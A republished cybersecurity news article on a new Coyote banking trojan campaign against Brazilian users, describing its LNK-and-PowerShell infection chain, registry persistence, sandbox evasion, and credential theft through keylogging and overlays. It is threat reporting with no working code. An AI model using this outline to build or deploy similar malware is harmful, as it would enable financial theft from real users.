info@thehackernews.com (The Hacker News)
2025-02-03 06:39:00
thehackernews.com
Brazilian Windows users are the target of a campaign that delivers a banking malware known as Coyote.
“Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials,” Fortinet FortiGuard Labs researcher Cara Lin said in an analysis published last week.
The cybersecurity company said it discovered over the past month several Windows Shortcut (LNK) file artifacts that contain PowerShell commands responsible for delivering the malware.
Coyote was first documented by Kaspersky in early 2024, detailing its attacks targeting users in the South American nation. It’s capable of harvesting sensitive information from over 70 financial applications.
In the previous attack chain documented by the Russian cybersecurity firm, a Squirrel installer executable is used to trigger a Node.js application compiled with Electron, that, for its part, runs a Nim-based loader to trigger the execution of the malicious Coyote payload.
The latest infection sequence, on the other hand, commences with an LNK file that executes a PowerShell command to retrieve the next-stage from a remote server (“tbet.geontrigame[.]com”), another PowerShell script that launches a loader responsible for executing an interim payload.
“The injected code leverages Donut, a tool designed to decrypt and execute the final MSIL (Microsoft Intermediate Language) payloads,” Lin said. “The decrypted MSIL execution file first establishes persistence by modifying the registry at ‘HCKU\Software\Microsoft\Windows\CurrentVersion\Run.'”
“If found, it removes the existing entry and creates a new one with a randomly generated name. This new registry entry contains a customized PowerShell command pointing to download and execute a Base64-encoded URL, which facilitates the main functions of the Coyote banking trojan.”
The malware, once launched, gathers basic system information and the list of installed antivirus products on the host, after which the data is Base64-encoded and exfiltrated to a remote server. It also performs various checks to evade detection by sandboxes and virtual environments.
A notable change in the latest iteration of Coyote is the expansion of its target list to encompass 1,030 sites and 73 financial agents, such as mercadobitcoin.com.br, bitcointrade.com.br, foxbit.com.br, augustoshotel.com.br, blumenhotelboutique.com.br, and fallshotel.com.br.
Should the victim attempt to access any one of the sites in the list, the malware contacts an attacker-controlled server to determine the next course of action, which can range from capturing a screenshot to serving overlays. Some of the other functions include displaying activating a keylogger and manipulating display settings.
“Coyote’s infection process is complex and multi-staged,” Lin said. “This attack leveraged an LNK file for initial access, which subsequently led to the discovery of other malicious files. This Trojan poses a significant threat to financial cybersecurity, particularly because it has the potential to expand beyond its initial targets.”
Upgrade your audio game with the Logitech for Creators Blue Yeti USB Microphone. With over 33,730 ratings and an impressive 4.6 out of 5 stars, it’s no wonder this is an Amazon’s Choice product. Recently, 5K+ units were purchased in the past month.
Available in five stunning colors: Teal, Silver, Pink Dawn, Midnight Blue, and Blackout, this microphone is perfect for creators looking to produce exceptional audio. Priced at only $84.99, it’s a deal you can’t afford to miss.
Elevate your recordings with clear broadcast-quality sound and explore your creativity with enhanced effects, advanced modulation, and HD audio samples. Order now for just $84.99 on Amazon!
Help Power Techcratic’s Future – Scan To Support
If Techcratic’s content and insights have helped you, consider giving back by supporting the platform with crypto. Every contribution makes a difference, whether it’s for high-quality content, server maintenance, or future updates. Techcratic is constantly evolving, and your support helps drive that progress.
As a solo operator who wears all the hats, creating content, managing the tech, and running the site, your support allows me to stay focused on delivering valuable resources. Your support keeps everything running smoothly and enables me to continue creating the content you love. I’m deeply grateful for your support, it truly means the world to me! Thank you!
BITCOIN bc1qlszw7elx2qahjwvaryh0tkgg8y68enw30gpvge Scan the QR code with your crypto wallet app |
DOGECOIN D64GwvvYQxFXYyan3oQCrmWfidf6T3JpBA Scan the QR code with your crypto wallet app |
ETHEREUM 0xe9BC980DF3d985730dA827996B43E4A62CCBAA7a Scan the QR code with your crypto wallet app |
Please read the Privacy and Security Disclaimer on how Techcratic handles your support.
Disclaimer: As an Amazon Associate, Techcratic may earn from qualifying purchases.